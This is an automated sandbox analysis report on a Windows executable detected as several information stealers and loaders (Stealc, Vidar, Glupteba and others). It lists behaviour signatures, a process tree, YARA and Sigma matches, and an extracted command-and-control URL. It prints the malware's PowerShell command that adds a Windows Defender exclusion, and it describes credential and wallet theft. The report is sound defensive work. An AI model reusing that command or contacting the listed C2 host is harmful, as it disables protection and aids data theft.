Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1407460
MD5:e533f92146fcacb8caca823882b8d304
SHA1:fcb2b79d08e2fb7a58142faf7db2a36f142b309d
SHA256:3cf0b82b4b91ac001ede7dfe7736f42e2a5e1bd9cc6da34393ec9e18ec81a9fe
Tags:exe
Infos:

Detection

Glupteba, Mars Stealer, Socks5Systemz, Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected Glupteba
Yara detected Mars stealer
Yara detected Socks5Systemz
Yara detected Stealc
Yara detected Vidar stealer
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
Creates HTML files with .exe extension (expired dropper behavior)
Disables UAC (registry)
Drops script or batch files to the startup folder
Found Tor onion address
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes many files with high entropy
Writes to foreign memory regions
Yara detected Generic Downloader
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Connects to several IPs in different countries
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Stores files to the Windows start menu directory
Stores large binary data to the registry
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7564 cmdline: C:\Users\user\Desktop\file.exe MD5: E533F92146FCACB8CACA823882B8D304)
    • powershell.exe (PID: 44284 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 44312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 44808 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • InstallUtil.exe (PID: 44324 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
      • fwUkFVOLVOFs3NY104r7giRJ.exe (PID: 44800 cmdline: "C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe" MD5: 9D959BCB3482D418504AF43B76F7A181)
        • fwUkFVOLVOFs3NY104r7giRJ.tmp (PID: 44904 cmdline: "C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp" /SL5="$104B0,1807550,56832,C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe" MD5: 1C1FD0B05187F81F28F910EB5B511E12)
          • weblinkanalyzer.exe (PID: 45024 cmdline: "C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe" -i MD5: B0E9D3290621648878CA0D486C60F951)
          • weblinkanalyzer.exe (PID: 7312 cmdline: "C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe" -s MD5: B0E9D3290621648878CA0D486C60F951)
      • 7g1UcaWDIadEWTPuXfBgjhjE.exe (PID: 45016 cmdline: "C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe" MD5: 4D3AD654117203E9216F6F44480BB6E0)
        • syncUpd.exe (PID: 44208 cmdline: C:\Users\user\AppData\Local\Temp\syncUpd.exe MD5: 220CB1B1688C2364B9AB272E37B896F3)
        • BroomSetup.exe (PID: 7220 cmdline: C:\Users\user\AppData\Local\Temp\BroomSetup.exe MD5: EEE5DDCFFBED16222CAC0A1B4E2E466E)
          • cmd.exe (PID: 11968 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 12152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • 0rb7lvvnt87bG7IAtAszCDpT.exe (PID: 44200 cmdline: "C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exe" MD5: 4D3AD654117203E9216F6F44480BB6E0)
      • DAOYzG6VUKOTbMmRBP4iG9FF.exe (PID: 8028 cmdline: "C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exe" MD5: 9D959BCB3482D418504AF43B76F7A181)
        • DAOYzG6VUKOTbMmRBP4iG9FF.tmp (PID: 3548 cmdline: "C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmp" /SL5="$504EC,1807550,56832,C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exe" MD5: 1C1FD0B05187F81F28F910EB5B511E12)
      • trvViErxBCFce9vUUZnny6xg.exe (PID: 7364 cmdline: "C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exe" MD5: 4D3AD654117203E9216F6F44480BB6E0)
      • MX6OxFuxXLJNkbD9F2dPLyyC.exe (PID: 8612 cmdline: "C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe" --silent --allusers=0 MD5: 61ACBBC8CAEF6EB5C8D4CBDE2EEC2312)
        • MX6OxFuxXLJNkbD9F2dPLyyC.exe (PID: 9404 cmdline: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2d0,0x300,0x6bfa21c8,0x6bfa21d4,0x6bfa21e0 MD5: 61ACBBC8CAEF6EB5C8D4CBDE2EEC2312)
        • MX6OxFuxXLJNkbD9F2dPLyyC.exe (PID: 11284 cmdline: "C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\MX6OxFuxXLJNkbD9F2dPLyyC.exe" --version MD5: 61ACBBC8CAEF6EB5C8D4CBDE2EEC2312)
      • 363PwSZXj46RramHioCvzZ7q.exe (PID: 8628 cmdline: "C:\Users\user\Pictures\363PwSZXj46RramHioCvzZ7q.exe" MD5: 4D3AD654117203E9216F6F44480BB6E0)
      • aKsTqJOcX9LAZThGesUnxmZk.exe (PID: 9792 cmdline: "C:\Users\user\Pictures\aKsTqJOcX9LAZThGesUnxmZk.exe" MD5: 4D3AD654117203E9216F6F44480BB6E0)
      • 51fuIpAxuIxVSFNlFyLCdDUf.exe (PID: 9972 cmdline: "C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe" --silent --allusers=0 MD5: B4CEF398C7001044330BE058549F9DE3)
        • 51fuIpAxuIxVSFNlFyLCdDUf.exe (PID: 11096 cmdline: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f8,0x2fc,0x300,0x2f4,0x304,0x6b3921c8,0x6b3921d4,0x6b3921e0 MD5: B4CEF398C7001044330BE058549F9DE3)
      • jBpaTqUJP0LUZLvKSUzQoPLO.exe (PID: 10472 cmdline: "C:\Users\user\Pictures\jBpaTqUJP0LUZLvKSUzQoPLO.exe" MD5: 4D3AD654117203E9216F6F44480BB6E0)
      • FnzHBAPEbvEEx8ZWWEvo0R6a.exe (PID: 10744 cmdline: "C:\Users\user\Pictures\FnzHBAPEbvEEx8ZWWEvo0R6a.exe" MD5: 9D959BCB3482D418504AF43B76F7A181)
        • FnzHBAPEbvEEx8ZWWEvo0R6a.tmp (PID: 12864 cmdline: "C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmp" /SL5="$30596,1807550,56832,C:\Users\user\Pictures\FnzHBAPEbvEEx8ZWWEvo0R6a.exe" MD5: 1C1FD0B05187F81F28F910EB5B511E12)
      • YeDvL2xULnFqNNxNLIvjO2b6.exe (PID: 10820 cmdline: "C:\Users\user\Pictures\YeDvL2xULnFqNNxNLIvjO2b6.exe" MD5: 4D3AD654117203E9216F6F44480BB6E0)
      • mlSjlt4YcfcpuVp4aQsoCouK.exe (PID: 11316 cmdline: "C:\Users\user\Pictures\mlSjlt4YcfcpuVp4aQsoCouK.exe" MD5: 9D959BCB3482D418504AF43B76F7A181)
      • f68SQOWBvY0lqnWRcqakARDI.exe (PID: 11704 cmdline: "C:\Users\user\Pictures\f68SQOWBvY0lqnWRcqakARDI.exe" MD5: F0A6999F1BC47C6C468CF6DB95003AD5)
      • 8aNg0kr81H7icHssfXxzSpJA.exe (PID: 11804 cmdline: "C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe" --silent --allusers=0 MD5: 95F97B76DCB43201CEBCFACE99D5C36C)
        • 8aNg0kr81H7icHssfXxzSpJA.exe (PID: 13620 cmdline: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2bc,0x300,0x6aa121c8,0x6aa121d4,0x6aa121e0 MD5: 95F97B76DCB43201CEBCFACE99D5C36C)
      • IelNhfi6M4d6yMRgQg9Svn6Z.exe (PID: 11920 cmdline: "C:\Users\user\Pictures\IelNhfi6M4d6yMRgQg9Svn6Z.exe" MD5: 4D3AD654117203E9216F6F44480BB6E0)
      • uOoBNdE6Sm5DmPd13osCbhQm.exe (PID: 12024 cmdline: "C:\Users\user\Pictures\uOoBNdE6Sm5DmPd13osCbhQm.exe" MD5: 9D959BCB3482D418504AF43B76F7A181)
      • 23jzBT2gZ2W4aFsNb8WtTEfu.exe (PID: 13308 cmdline: "C:\Users\user\Pictures\23jzBT2gZ2W4aFsNb8WtTEfu.exe" MD5: F0A6999F1BC47C6C468CF6DB95003AD5)
      • 1EkTthwf6man8aNjDkP3iYby.exe (PID: 13384 cmdline: "C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exe" --silent --allusers=0 MD5: AAFB0357588673B1DB5973DFF4616B8F)
    • WerFault.exe (PID: 44592 cmdline: C:\Windows\system32\WerFault.exe -u -p 7564 -s 73500 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 7656 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 44436 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 44516 cmdline: C:\Windows\system32\WerFault.exe -pss -s 456 -p 7564 -ip 7564 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
GluptebaGlupteba is a trojan horse malware that is one of the top ten malware variants of 2021. After infecting a system, the Glupteba malware can be used to deliver additional malware, steal user authentication information, and enroll the infected system in a cryptomining botnet.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.172.128.145/3cd2b41cbde8fc9c.php"}

Threatname: Vidar

{"C2 url": "http://185.172.128.145/3cd2b41cbde8fc9c.php"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Web Link Analyzer\is-5KR53.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
    C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000011.00000002.3181473452.0000000000703000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
        • 0xd38:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
        00000015.00000000.2055445939.0000000000401000.00000020.00000001.01000000.00000011.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
          00000015.00000002.3188674818.0000000002A7B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
            00000011.00000002.3182663739.0000000000718000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
              0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
              • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
              Click to see the 22 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              17.2.syncUpd.exe.6a0e67.1.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                17.2.syncUpd.exe.6a0e67.1.unpackJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
                  8.2.InstallUtil.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    17.2.syncUpd.exe.400000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                      17.2.syncUpd.exe.400000.0.raw.unpackJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
                        Click to see the 16 entries

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\file.exe, ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7564, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force, ProcessId: 44284, ProcessName: powershell.exe
                        Sigma detected: Powershell Defender Exclusion
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\file.exe, ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7564, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force, ProcessId: 44284, ProcessName: powershell.exe
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\file.exe, ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7564, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force, ProcessId: 44284, ProcessName: powershell.exe
                        Sigma detected: Windows Processes Suspicious Parent Directory
                        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7656, ProcessName: svchost.exe

                        Data Obfuscation

                        barindex
                        Sigma detected: Drops script at startup location
                        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ProcessId: 44324, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CAjdcCiGIZYnFjRUzQZOkZkX.bat

                        Snort Signatures

                        No Snort rule has matched

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus detection for dropped file
                        Source: C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exeAvira: detection malicious, Label: HEUR/AGEN.1315065
                        Found malware configuration
                        Source: 00000011.00000002.3182663739.0000000000718000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://185.172.128.145/3cd2b41cbde8fc9c.php"}
                        Source: 00000011.00000003.2098832064.00000000008C0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "http://185.172.128.145/3cd2b41cbde8fc9c.php"}
                        Multi AV Scanner detection for submitted file
                        Source: file.exeReversingLabs: Detection: 18%
                        Yara detected Glupteba
                        Source: Yara matchFile source: 42.3.23jzBT2gZ2W4aFsNb8WtTEfu.exe.3760000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.2.f68SQOWBvY0lqnWRcqakARDI.exe.400000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 42.2.23jzBT2gZ2W4aFsNb8WtTEfu.exe.2e70e67.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 42.2.23jzBT2gZ2W4aFsNb8WtTEfu.exe.400000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.2.f68SQOWBvY0lqnWRcqakARDI.exe.2e40e67.13.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000002A.00000002.3151976507.0000000000843000.00000040.00000001.01000000.0000002F.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002A.00000002.3216850943.00000000032B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000023.00000002.3151609844.0000000000843000.00000040.00000001.01000000.00000026.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000023.00000002.3216579731.0000000003283000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002A.00000003.2605227269.0000000003BA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Machine Learning detection for dropped file
                        Source: C:\Users\user\AppData\Local\6mUOGmYOgu78GIQPbKV3WDdm.exeJoe Sandbox ML: detected
                        Source: C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exeJoe Sandbox ML: detected
                        Sample uses string decryption to hide its real strings
                        Source: 17.2.syncUpd.exe.400000.0.raw.unpackString decryptor: CtIvEWInDoW
                        Source: 17.2.syncUpd.exe.400000.0.raw.unpackString decryptor: AgEBOxw
                        Source: 17.2.syncUpd.exe.400000.0.raw.unpackString decryptor: ijklmnopqrs
                        Source: 17.2.syncUpd.exe.400000.0.raw.unpackString decryptor: /#%33@@@
                        Source: 17.2.syncUpd.exe.400000.0.raw.unpackString decryptor: abcdefghijklmnopqrs
                        Source: 17.2.syncUpd.exe.400000.0.raw.unpackString decryptor: @@@@<@@@
                        Source: 17.2.syncUpd.exe.400000.0.raw.unpackString decryptor: abcdefghijklmnopqrs
                        Source: 17.2.syncUpd.exe.400000.0.raw.unpackString decryptor: "&&""..""&&"">>""&&"".."ikSQWQSQ_QBEklmn^pqrBtuvFxyzL123H5679+/|
                        Source: 17.2.syncUpd.exe.400000.0.raw.unpackString decryptor: %s\%V/yVs
                        Source: 17.2.syncUpd.exe.400000.0.raw.unpackString decryptor: %s\*.
                        Source: 17.2.syncUpd.exe.400000.0.raw.unpackString decryptor: }567y9n/S
                        Source: 17.2.syncUpd.exe.400000.0.raw.unpackString decryptor: ntTekeny
                        Source: 17.2.syncUpd.exe.400000.0.raw.unpackString decryptor: ging
                        Source: 17.2.syncUpd.exe.400000.0.raw.unpackString decryptor: PassMord0
                        Source: 17.2.syncUpd.exe.400000.0.raw.unpackString decryptor: J@@@`z`@J@@@J@@@
                        Source: 17.2.syncUpd.exe.400000.0.raw.unpackString decryptor: OPQRSTUVWXY
                        Source: 17.2.syncUpd.exe.400000.0.raw.unpackString decryptor: 456753+/---- '
                        Source: 17.2.syncUpd.exe.400000.0.raw.unpackString decryptor: '--- '
                        Source: 17.2.syncUpd.exe.400000.0.raw.unpackString decryptor: qRslaZ9Iw|
                        Source: 17.2.syncUpd.exe.400000.0.raw.unpackString decryptor: HeapFree
                        Source: 17.2.syncUpd.exe.400000.0.raw.unpackString decryptor: GetLocaleInfoA
                        Source: 17.2.syncUpd.exe.400000.0.raw.unpackString decryptor: ntProcessId
                        Source: 17.2.syncUpd.exe.400000.0.raw.unpackString decryptor: wininet.dll
                        Source: 17.2.syncUpd.exe.400000.0.raw.unpackString decryptor: shlwapi.dll
                        Source: 17.2.syncUpd.exe.400000.0.raw.unpackString decryptor: shell32.dll
                        Source: 17.2.syncUpd.exe.400000.0.raw.unpackString decryptor: .dll
                        Source: 17.2.syncUpd.exe.400000.0.raw.unpackString decryptor: column_text
                        Source: 17.2.syncUpd.exe.400000.0.raw.unpackString decryptor: }67b)>4`,LXZu2L6qd
                        Source: 17.2.syncUpd.exe.400000.0.raw.unpackString decryptor: login:
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_0045D188 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,14_2_0045D188
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_0045D254 ArcFourCrypt,14_2_0045D254
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_0045D23C ArcFourCrypt,14_2_0045D23C
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_10001000 ISCryptGetVersion,14_2_10001000
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_10001130 ArcFourCrypt,14_2_10001130
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree,17_2_00409540
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,17_2_00406C10
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,17_2_004094A0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_004155A0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,17_2_004155A0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,17_2_0040BF90
